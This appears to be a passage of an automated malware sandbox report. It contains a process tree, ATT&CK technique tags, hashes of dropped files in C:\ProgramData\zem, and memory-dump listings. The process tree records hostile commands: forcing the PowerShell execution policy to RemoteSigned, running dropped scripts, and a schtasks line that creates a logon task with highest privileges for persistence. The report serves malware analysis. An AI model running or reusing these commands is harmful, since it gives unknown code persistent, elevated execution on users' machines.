C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2AD.tmp" "c:\Users\Admin\AppData\Local\Temp\pftbpevt\CSCA5BC580AF6EE420E902A6861B0103F6C.TMP"
5⤵
PID:1712

C:\Windows\System32\setx.exe
"C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate "133129934484078047"
4⤵
PID:228

C:\Windows\System32\setx.exe
"C:\Windows\System32\setx.exe" ChocolateyLastPathUpdate "133129934498296854"
4⤵
PID:3572

C:\ProgramData\chocolatey\choco.exe
"C:\ProgramData\chocolatey\choco.exe" -v
4⤵
- Executes dropped EXE
PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell cinst powershell -y
2⤵
PID:3380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell cinst powershell -y
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo chocolatey >> %ALLUSERSPROFILE%\zem\log\not_in_right_dir_chocolatey.txt
2⤵
PID:4472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c %ALLUSERSPROFILE%\zem\run.bat
2⤵
PID:1144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "Set-ExecutionPolicy RemoteSigned -force"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell C:\ProgramData\zem\start.ps1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\zem\update64.bat
2⤵
PID:3320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\zem\start.bat
1⤵
PID:3856

C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /RU Admin /TN "test_n_timecli" /TR "C:\ProgramData\zem\time_cli.exe" /F /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:1248

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\chocolatey\choco.exe
Filesize
7.3MB

MD5
cb3a19901a422660c36a96284b125b29

SHA1
b31020d098e898d3e6e74e46a3be2db375272779

SHA256
9078bd7a82267c4605dcdf4d4ad8d03150cd9eec84c88965a3fcd4193cf1f8d7

SHA512
1c6a0d305f0cd0c1d1dfe799c172cbe55503bd940557a67a42758b8d2f3e9707522df9e5d71113915edc4ee3c3714ec899c4452dee897596c7fb01dd6ccc4a68

Download Submit
C:\ProgramData\chocolatey\choco.exe
Filesize
7.3MB

MD5
cb3a19901a422660c36a96284b125b29

SHA1
b31020d098e898d3e6e74e46a3be2db375272779

SHA256
9078bd7a82267c4605dcdf4d4ad8d03150cd9eec84c88965a3fcd4193cf1f8d7

SHA512
1c6a0d305f0cd0c1d1dfe799c172cbe55503bd940557a67a42758b8d2f3e9707522df9e5d71113915edc4ee3c3714ec899c4452dee897596c7fb01dd6ccc4a68

Download Submit
C:\ProgramData\zem\run.bat
Filesize
2KB

MD5
8b3dedfae44579dbb69419c1b7f39cb3

SHA1
9955cf4cae7f8338286a2891aa357ba6168138e8

SHA256
a1277bd1956b02a2f759ad30eca3215ba2c83eab72dfa9f815d39564bc4a9e1c

SHA512
ff95d8854dd0b017bbe1cec582b3d504e53dad65729034d1ee69d9313cc4279fa9ea0f61f698b04f9a3c3c174260805212b46d606a672538f8c6b56bf9d50fa7

Download Submit
C:\ProgramData\zem\start.bat
Filesize
415B

MD5
e808c807fb41cb9a2fc8714b1a5cd048

SHA1
2c7843c932301f6ceed5ace6753999eb0bc83366

SHA256
3ee70cf43535fc65581f3edf34674e8f2769e661911ba7cf2dcb359cedf40fb8

SHA512
de65ddc77e1542a653dc049d4d5dcbab03bd7b63921844d6a4b4cf6c12c33d0c0ae27ff7f38d6cbd8c2708fb4e2b8ad4d8ea8434e3d3b491cf805aafe9a201ad

Download Submit
C:\ProgramData\zem\start.ps1
Filesize
1KB

MD5
bf8561246e2dad06c4ce34b397e874d3

SHA1
47fd915a1094f373f445186b438703de228481a6

SHA256
c57a761935e8b3a9cf697f6d1ad069cc839bb98ea79beeb5ad635802ce10500d

SHA512
45047c45e6964859b601593647489e2440a1b0ff8c1a826fcd35a5f945275410cff79d4d4b95ee378c63b818db8fac999f7b620e6722da68119ee07c726bae5e

Download Submit
C:\ProgramData\zem\tmp.exe
Filesize
532KB

MD5
cba9caa64e418a546044daa8744800b3

SHA1
72060361b8a025ea3e132f6015cb20a87d3dff44

SHA256
9aa8880ca3650ef28c7a1dd5869a4d720ca0f62bda8ada3fcd86226b6f20e123

SHA512
aac883eb4a0d5718d64a592632d1270c3f7ab8b8e1555f0c0a940922bc325dc07dea44a09ea3da0a0e834a4b266f1d6eb20b54523811c5992abbfc9bc56e4129

Download Submit
C:\ProgramData\zem\wget.exe
Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\ProgramData\zem\wget.exe
Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\ProgramData\zem\wget.exe
Filesize
392KB

MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
fe3aab3ae544a134b68e881b82b70169

SHA1
926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

SHA256
bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

SHA512
3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c5e9b9cd25ed3f12b42381eed720f66c

SHA1
940a2ff87a60bf3cef0688520c16d8560a465d0c

SHA256
54b57c9f9b168348e3cdcb1e7e41500602a2267d35c71675810aa34fca004164

SHA512
7136952640574008e1d38a5737f150f044205ed0fca86d5455e208c8b636a57b55b1e5ce9defd331e8b0431775b979a409f9abb27ef0b01429cc30c21e7e9b37

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
692a440f9cfbeaf648632aead685a5a1

SHA1
e4e4bd8405be77294f4be5ea18b5e05b139f35af

SHA256
3e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4

SHA512
c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
e5b84d9e354fd09e2bb5c57546905f44

SHA1
902c3fa5acd848e053da89d434fea41933e98d78

SHA256
7615b74b755b33bde20d6026bd14a1cb1866d3013b9dc231a3dfeb071b4e29d2

SHA512
7531296d1d190e3e6b4be560658e939d8c6fdec5d22b50a6068a66feb2a85a36715d12170d14c52d27d4fe57184e9297b029732401033ede186cc446b481c1e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA2AD.tmp
Filesize
1KB

MD5
4b014ab5e2f04258527b1faf9717890f

SHA1
1f50e968ff7a264173661331688af01137a654f4

SHA256
d700f55ada9a9e601da68e977854dd734b5b1e16d0793ff67b541c6504e60682

SHA512
8a023a89aa9a5ca18b8a15275d78a22f96b425783393440b0f8b62a8df7ce4e031003eaaecbad2d7547d617b4d02e6c4e15f50efe2c8f4e4c43f32afe096cbf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.dll
Filesize
3KB

MD5
6aec9f305454797aff7a96c0b3efff4d

SHA1
299cd53129e8bc1d18ea734c05211ed154cb5236

SHA256
c5b124cdffd31f3d5224878bb1594e2221d1431c4a4dd452fee0a5f85dc9c6a7

SHA512
e0d4cc98e7f316e86cad5ba51f616310c5d2db6840d21fa25a034378832b1ad4c5332af9df8c96b4d98ce2c3a49360003404c2bbb1c312ffad59cba42a156c19

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pftbpevt\CSCA5BC580AF6EE420E902A6861B0103F6C.TMP
Filesize
652B

MD5
df02626815bf271a859b37e6d143d96d

SHA1
86144242dbcf2e59034398440ae0f855c5cd2f2c

SHA256
dc867d9227477c215e1d68c97d90c1d9c854fbb6ed057ac40b9c2a7184b53421

SHA512
f4a44c7e8cde0f7812abf7ea31e071232f18eed97693527b8dc60e2d430dbfabf8453fd92571b04f5e33b03c8cb4d6fd83a7ea8911281488299e56252bb3c239

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.0.cs
Filesize
363B

MD5
fe0a20ae8ae6560ff6da930c7a650c80

SHA1
b17a90207c3fd39abfcd37a79428961d401c0de6

SHA256
2887d6cced4527e90685dea484f31e882a7352ca66bdb5f5c7dd8924b6885dce

SHA512
d2505e75392877bc4bff0b9b145da35fb2c4fea86c6c6ee3ec7af06fb774abb27dd651242f6797e0e81127619a64662874cc1623262607de65fb332848de4531

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.cmdline
Filesize
369B

MD5
6a80b1cb12e12d1aacbce1736d5951b3

SHA1
5d563403102262f74f41c688474e4d649295ed35

SHA256
71c86045ff58eb88a33c6ee52bfa275d257109ef428309aa8de3d18bfd10e9fb

SHA512
3431cafd3a6abcb7e66e0b029be7a7b2bdc11aeb421cb4798f58441eda8dce8457560db9fc3c179be95b53898cd0a7235fcae6cb19690de5e27b9318d7ddb7ff

Download Submit
memory/388-137-0x0000000000000000-mapping.dmp

Download
memory/644-133-0x0000000000000000-mapping.dmp

Download
memory/644-186-0x0000000000000000-mapping.dmp

Download
memory/736-193-0x0000000000000000-mapping.dmp

Download
memory/976-195-0x0000000000000000-mapping.dmp

Download
memory/992-179-0x0000000000000000-mapping.dmp

Download
memory/1084-135-0x0000000000000000-mapping.dmp

Download
memory/1104-182-0x0000000000000000-mapping.dmp

Download
memory/1144-196-0x0000000000000000-mapping.dmp

Download
memory/1180-139-0x0000000000000000-mapping.dmp

Download
memory/1188-161-0x0000000000000000-mapping.dmp

Download
memory/1264-224-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmp

Filesize
10.8MB

Download
memory/1264-217-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmp

Filesize
10.8MB

Download
memory/1264-208-0x00000260F1EB0000-0x00000260F1EBA000-memory.dmp

Filesize
40KB

Download
memory/1264-207-0x00000260F1ED0000-0x00000260F1EE2000-memory.dmp

Filesize
72KB

Download
memory/1264-205-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmp

Filesize
10.8MB

Download
memory/1264-204-0x00000260F1210000-0x00000260F1232000-memory.dmp

Filesize
136KB

Download
memory/1264-183-0x0000000000000000-mapping.dmp

Download
memory/1292-164-0x0000000000000000-mapping.dmp

Download
memory/1320-187-0x0000000000000000-mapping.dmp

Download
memory/1340-156-0x0000000000000000-mapping.dmp

Download
memory/1340-232-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmp

Filesize
10.8MB

Download
memory/1412-169-0x0000000000000000-mapping.dmp

Download
memory/1504-140-0x0000000000000000-mapping.dmp

Download
memory/1592-178-0x0000000000000000-mapping.dmp

Download
memory/1644-158-0x0000000000000000-mapping.dmp

Download
memory/1688-198-0x0000000000000000-mapping.dmp

Download
memory/1864-132-0x0000000000000000-mapping.dmp

Download
memory/1864-180-0x0000000000000000-mapping.dmp

Download
memory/1912-144-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/1912-141-0x0000000000000000-mapping.dmp

Download
memory/2056-185-0x0000000000000000-mapping.dmp

Download
memory/2120-157-0x0000000000000000-mapping.dmp

Download
memory/2128-181-0x0000000000000000-mapping.dmp

Download
memory/2164-200-0x0000000000000000-mapping.dmp

Download
memory/2240-173-0x0000000000000000-mapping.dmp

Download
memory/2552-237-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmp

Filesize
10.8MB

Download
memory/2552-235-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmp

Filesize
10.8MB

Download
memory/2576-202-0x0000000000000000-mapping.dmp

Download
memory/2648-188-0x0000000000000000-mapping.dmp

Download
memory/2660-201-0x0000000000000000-mapping.dmp

Download
memory/2676-197-0x0000000000000000-mapping.dmp

Download
memory/2832-172-0x0000000000000000-mapping.dmp

Download
memory/2928-190-0x0000000000000000-mapping.dmp

Download
memory/2960-149-0x0000000000000000-mapping.dmp

Download
memory/3060-163-0x0000000000000000-mapping.dmp

Download
memory/3424-138-0x0000000000000000-mapping.dmp

Download
memory/3468-165-0x0000000000000000-mapping.dmp

Download
memory/3476-162-0x0000000000000000-mapping.dmp

Download
memory/3560-194-0x0000000000000000-mapping.dmp

Download
memory/3572-191-0x0000000000000000-mapping.dmp

Download
memory/3596-166-0x0000000000000000-mapping.dmp

Download
memory/3660-153-0x0000000000000000-mapping.dmp

Download
memory/3772-199-0x0000000000000000-mapping.dmp

Download
memory/3780-145-0x0000000000000000-mapping.dmp

Download
memory/3780-147-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/3780-148-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/3820-152-0x0000000000000000-mapping.dmp

Download
memory/3824-192-0x0000000000000000-mapping.dmp

Download
memory/3912-184-0x0000000000000000-mapping.dmp

Download
memory/4088-177-0x0000000000000000-mapping.dmp

Download
memory/4092-216-0x0000000000AD0000-0x000000000121A000-memory.dmp

Filesize
7.3MB

Download
memory/4092-223-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmp

Filesize
10.8MB

Download
memory/4092-218-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmp

Filesize
10.8MB

Download
memory/4092-219-0x0000000001780000-0x00000000017A0000-memory.dmp

Filesize
128KB

Download
memory/4092-220-0x000000001D280000-0x000000001D2D0000-memory.dmp

Filesize
320KB

Download
memory/4092-221-0x000000001D350000-0x000000001D3C6000-memory.dmp

Filesize
472KB

Download
memory/4092-222-0x0000000001A40000-0x0000000001A5E000-memory.dmp

Filesize
120KB

Download
memory/4224-171-0x0000000000000000-mapping.dmp

Download
memory/4268-136-0x0000000000000000-mapping.dmp

Download
memory/4280-150-0x0000000000000000-mapping.dmp

Download
memory/4288-175-0x0000000000000000-mapping.dmp

Download
memory/4352-189-0x0000000000000000-mapping.dmp

Download
memory/4356-168-0x0000000000000000-mapping.dmp

Download
memory/4464-227-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmp

Filesize
10.8MB

Download
memory/4464-228-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmp

Filesize
10.8MB

Download
memory/4544-167-0x0000000000000000-mapping.dmp

Download
memory/4684-170-0x0000000000000000-mapping.dmp

Download
memory/4708-176-0x0000000000000000-mapping.dmp

Download
memory/4720-206-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp

Filesize
1.3MB

Download
memory/4720-230-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp

Filesize
1.3MB

Download
memory/4720-134-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp

Filesize
1.3MB

Download
memory/4780-154-0x0000000000000000-mapping.dmp

Download
memory/4796-160-0x0000000000000000-mapping.dmp

Download
memory/4888-174-0x0000000000000000-mapping.dmp

Download
memory/5016-155-0x0000000000000000-mapping.dmp

Download
memory/5072-203-0x0000000000000000-mapping.dmp

Download
memory/5116-159-0x0000000000000000-mapping.dmp

Download